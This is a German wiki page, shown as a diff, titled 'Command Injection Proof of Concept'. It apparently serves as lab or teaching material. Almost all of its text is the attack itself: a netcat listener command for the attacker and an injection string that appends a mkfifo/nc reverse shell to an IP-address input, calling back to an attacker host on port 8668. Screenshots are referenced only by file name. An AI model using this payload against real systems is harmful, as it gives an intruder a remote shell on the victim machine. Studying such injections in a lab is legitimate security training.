Command Injection Proof of Concept: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 9: Zeile 9:
  
 
[[Datei:Command-injetion1.png]]
 
[[Datei:Command-injetion1.png]]
 +
=Auf dem Angreifer=
 +
[[Datei:Command-injetion2.png]]

Version vom 27. Juni 2021, 16:22 Uhr

PHP Code

Command-injection.png

Angreifer

  • netcat -lp 8668

Schadcode einbringen

  • 1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe

Command-injetion1.png

Auf dem Angreifer

Command-injetion2.png

Abgerufen von „http://wiki.ixheim.de/index.php?title=Command_Injection_Proof_of_Concept&oldid=25150